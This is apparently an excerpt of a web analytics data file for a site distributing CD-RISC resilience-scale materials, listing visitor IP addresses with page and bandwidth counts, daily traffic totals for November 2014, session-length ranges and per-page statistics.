187.6.87.234 1 3 11639 20141125051628
198.161.230.10 5 17 228031 20141122160458
49.15.205.243 2 4 22300 20141104002849
128.148.231.16 2 4 19741 20141121152448
74.137.247.78 1 3 11639 20141108164009
123.231.244.41 1 3 11639 20141130234955
194.35.219.99 5 7 43332 20141126134427
72.9.103.210 7 7 302525 20141124220514
172.56.31.47 2 4 19741 20141111235308
180.253.127.245 1 3 11639 20141110101102
214.28.226.254 2 4 24399 20141124110115
76.178.142.246 2 4 197629 20141122020719
71.62.105.27 6 8 373026 20141120032448
129.67.13.140 3 5 223721 20141113083347
147.8.16.140 9 13 526496 20141101053136
5.250.97.148 1 3 11639 20141130002659
87.79.132.141 1 3 11639 20141109071854
216.146.124.30 11 17 422800 20141128153525
101.199.108.119 1 3 11639 20141126080348
66.249.84.170 3 3 24306 20141111222020
128.104.208.149 8 10 250184 20141127152759
76.29.24.218 2 4 76310 20141122140820
94.36.79.245 2 2 12858 20141113100322
82.44.56.167 4 6 349605 20141129050023
216.195.7.65 5 7 48705 20141118210149
50.178.227.9 5 13 62335 20141110001800
67.191.157.163 2 4 22300 20141116164315
160.79.139.10 6 14 230300 20141118074657
86.6.226.34 1 3 11639 20141117101740
179.34.25.117 1 3 11639 20141127201052
23.94.59.202 2 2 34281 20141106151729
152.20.238.225 4 6 349605 20141117154413
222.178.202.134 1 3 11639 20141109215514
186.28.50.23 1 3 11639 20141102184852
139.80.180.70 1 3 11639 20141116205831
69.114.90.19 2 4 22300 20141126192432
177.32.80.91 1 3 11639 20141120222619
149.132.131.80 4 6 32671 20141128064532
175.44.6.200 16 16 192768 20141130044630
179.234.160.106 1 3 11639 20141120112927
90.170.141.78 2 6 23278 20141108160907
158.111.4.52 5 9 50143 20141112164403
130.216.132.56 9 11 252841 20141126140835
189.62.232.89 1 3 11639 20141130131751
187.54.211.83 1 3 11639 20141129141352
179.107.242.215 1 3 11639 20141117095709
31.205.75.157 1 3 11639 20141123102103
173.20.96.7 1 3 11639 20141120100529
115.119.87.82 0 1 2261 
64.122.211.90 3 7 36038 20141120163042
109.154.11.136 3 5 210389 20141103083224
198.199.83.127 8 10 327583 20141101082756
186.146.198.164 9 20 137050 20141117230702
54.80.19.208 2 6 197820 20141122171322
157.27.129.179 1 3 11639 20141111061442
186.85.135.188 1 3 11639 20141112211821
160.80.2.38 6 10 471568 20141123142650
87.103.60.71 1 3 11639 20141126091125
106.51.44.130 3 5 210389 20141118113909
117.204.120.166 1 3 11639 20141122081312
68.50.248.80 1 1 12760 20141109181934
209.60.102.49 1 3 25058 20141110173056
95.136.104.174 1 3 11639 20141125142125
173.220.9.188 2 4 24399 20141120144506
172.9.145.37 9 13 628011 20141117200821
69.54.60.210 2 4 24399 20141106025015
175.44.6.175 4 4 48192 20141104123451
177.6.182.99 1 3 11639 20141114195656
46.32.7.230 2 4 155513 20141112021956
49.148.244.237 1 3 11639 20141124111622
181.53.149.55 1 3 11639 20141118220253
149.68.137.67 1 3 14198 20141103160535
54.166.202.33 1 1 8102 20141109073039
182.181.163.87 2 4 19741 20141101105318
31.211.134.9 1 3 11639 20141122194215
199.30.25.251 0 1 1276 
125.254.33.122 1 3 16297 20141113205122
140.142.63.92 3 5 205731 20141120143711
190.67.132.66 6 10 240791 20141115161428
54.80.74.240 2 2 190746 20141122170644
84.211.135.79 4 6 174276 20141119173055
201.43.49.184 1 3 11639 20141105202851
137.155.240.135 1 3 11639 20141118205614
92.229.151.236 1 3 11639 20141123072916
62.241.24.167 1 3 11639 20141105063830
23.236.249.251 2 2 34281 20141111143507
209.147.118.37 1 3 16297 20141110044210
65.55.210.2 0 1 2261 
66.249.81.225 1 1 143874 20141113060357
96.241.232.212 2 4 155513 20141110174107
93.82.82.20 9 13 613656 20141128082440
201.69.60.89 1 3 11639 20141120100710
190.104.131.7 1 3 11639 20141120190305
114.79.18.155 2 2 194092 20141107042707
49.146.207.16 1 3 11639 20141129211315
85.54.231.254 1 3 11639 20141109125504
12.130.117.32 1 3 11639 20141114165536
137.73.105.120 7 11 486887 20141119081624
202.242.187.156 3 5 202385 20141117035548
60.240.29.163 5 7 43332 20141125194746
130.211.159.84 1 1 8102 20141112101340
147.188.178.148 1 3 11639 20141120034428
207.34.252.17 2 4 155513 20141102101513
67.175.71.94 3 9 40035 20141102145134
189.82.55.42 1 3 11639 20141128133131
74.166.124.250 4 6 213833 20141124124410
146.83.108.146 1 3 11639 20141111181348
213.159.38.90 2 2 16204 20141109001253
12.230.217.7 2 4 155513 20141117224115
119.94.24.247 1 1 143874 20141123083901
175.159.95.193 2 4 24859 20141107055134
155.41.73.153 1 3 11639 20141119114521
128.59.176.247 5 7 362365 20141126114445
5.96.97.34 4 8 45452 20141111032355
129.120.2.129 2 4 20726 20141112152953
86.6.197.78 1 3 11639 20141123170306
182.64.50.14 2 4 19741 20141101080510
79.55.33.116 1 3 11639 20141105140849
130.211.182.255 1 1 8102 20141112110837
187.87.48.46 1 3 11639 20141117073037
216.54.92.25 2 4 197629 20141118104107
173.149.133.60 8 10 562460 20141106115826
66.249.84.84 1 1 12760 20141101023052
140.107.39.188 4 6 38504 20141108154913
175.44.24.19 3 3 36144 20141104102948
110.55.2.191 4 6 155513 20141110044349
162.207.226.79 1 3 11639 20141129132113
76.164.192.106 2 2 18763 20141106144000
221.172.208.76 1 1 21521 20141101063826
154.5.96.252 6 8 53533 20141104213753
69.92.119.171 1 3 11639 20141120145218
178.59.168.79 1 3 11639 20141105034948
180.247.73.23 4 6 35158 20141108104529
107.222.125.214 1 3 11639 20141103150104
99.122.232.123 1 3 11639 20141105101738
41.210.159.198 2 4 19741 20141118044821
155.54.206.166 1 3 11639 20141125051740
5.12.114.125 1 3 11639 20141107161723
112.64.235.252 1 1 8102 20141107093145
66.108.111.44 8 12 314215 20141102203330
111.68.103.16 1 3 11639 20141108161041
175.45.187.254 3 5 168273 20141107012729
1.162.252.149 2 4 19741 20141102103844
74.96.205.97 1 3 11639 20141101201902
66.188.180.205 3 5 210389 20141116101811
137.52.1.11 4 8 353142 20141130160049
193.52.103.22 7 11 438154 20141110101143
103.14.63.157 1 3 11639 20141114035435
214.21.128.15 3 5 37159 20141112170604
63.66.64.244 1 1 12760 20141106144913
114.25.206.252 1 3 11639 20141105100827
170.223.207.27 1 4 18558 20141124115732
71.87.4.220 1 3 11639 20141121122440
175.44.7.37 16 16 192768 20141122134827
119.63.193.196 1 1 8102 20141116034505
182.66.19.153 1 3 25058 20141126115242
86.185.178.52 4 6 181033 20141101122822
72.200.204.99 5 9 357898 20141121101011
162.119.128.145 3 5 341503 20141103203856
73.167.120.133 2 6 23278 20141124233057
63.253.201.250 8 10 451895 20141125132155
199.212.65.121 8 10 224761 20141112132139
117.211.83.19 4 6 218491 20141120055220
81.35.119.216 5 9 357898 20141117143351
142.105.168.16 8 12 238572 20141122183928
174.97.37.205 1 3 71745 20141102070934
188.57.178.37 1 3 11639 20141124070200
174.116.178.68 4 6 32671 20141124215237
155.94.217.155 2 2 34281 20141120203126
86.1.127.57 5 7 48705 20141116153412
200.165.193.140 1 3 11639 20141105132102
146.230.81.22 5 7 283353 20141119055922
139.137.128.45 2 6 23278 20141124133814
190.83.174.3 1 3 71745 20141104083324
173.250.163.167 3 7 213926 20141114181141
190.83.248.42 3 7 167152 20141104192337
134.220.65.104 5 9 230130 20141106121028
216.165.126.117 1 3 11639 20141107094331
98.217.58.5 8 10 120357 20141121070639
141.30.246.13 5 7 37427 20141118104510
213.205.233.37 1 1 8102 20141125081602
24.54.112.56 2 4 155513 20141130212401
108.31.96.7 1 3 11639 20141130213313
202.186.7.223 1 1 8102 20141115052723
24.134.56.10 4 6 213833 20141111112841
122.107.107.46 3 5 32501 20141130225012
76.164.225.75 8 8 324046 20141121052931
166.216.165.32 3 5 37159 20141112145348
94.162.111.239 1 3 11639 20141104072518
192.87.23.102 1 3 11639 20141127075218
128.250.5.244 14 14 669625 20141130230540
203.188.221.65 2 4 19741 20141106001450
194.80.66.254 10 14 652892 20141117104756
209.147.118.173 1 1 143874 20141130171403
67.78.65.77 4 6 96051 20141130130119
78.134.48.210 1 1 8102 20141116072627
27.97.204.83 2 2 20862 20141108015754
END_VISITOR

# Date - Pages - Hits - Bandwidth - Visits
BEGIN_DAY 30
20141101 98 162 3459678 51
20141102 101 174 2886243 60
20141103 231 400 9880740 100
20141104 247 405 7481961 112
20141105 255 439 9849956 94
20141106 298 466 12686665 113
20141107 175 316 5589266 73
20141108 152 261 5973868 67
20141109 188 308 7364351 76
20141110 298 516 12335859 107
20141111 214 358 6798101 89
20141112 198 334 6557861 79
20141113 235 383 7030702 105
20141114 228 365 9068073 85
20141115 138 218 4202989 63
20141116 143 251 4705398 64
20141117 250 399 10079076 86
20141118 326 486 12471836 98
20141119 240 448 10263596 105
20141120 217 362 8381304 93
20141121 233 357 9521406 75
20141122 117 210 4640379 60
20141123 128 229 5404826 62
20141124 237 413 7912380 94
20141125 150 253 5881990 54
20141126 156 264 5233377 73
20141127 151 255 6556741 52
20141128 148 250 5452226 62
20141129 161 271 5070511 73
20141130 145 233 5931336 59
END_DAY

# Session range - Number of visits
BEGIN_SESSION 7
1h+ 24
5mn-15mn 156
2mn-5mn 169
0s-30s 1629
15mn-30mn 94
30s-2mn 249
30mn-1h 63
END_SESSION

# URL - Pages - Bandwidth - Entry - Exit
# The 10 first Pages must be first (order not required for others)
BEGIN_SIDER 13
/ 2379 19169332 1701 1152
/cd-risc/userguide.shtml 590 109526928 37 135
/cd-risc/requestform.shtml 533 6673480 102 230
/index.shtml 526 4075306 80 192
/cd-risc/faq.shtml 496 5287856 109 193
/cd-risc/bibliography.shtml 305 20803440 66 124
/cd-risc/translations.shtml 283 1345948 20 46
/cd-risc/request-form.pdf 277 38558232 50 118
/cd-risc/privacypolicy.shtml 199 2397552 120 123
/cd-risc/termsofservice.shtml 195 4196595 89 65
/BingSiteAuth.xml 4 340 4 4
/cd-risc/requestform.php 70 11900 5 2
/cd-risc/ 1 0 1 0
END_SIDER
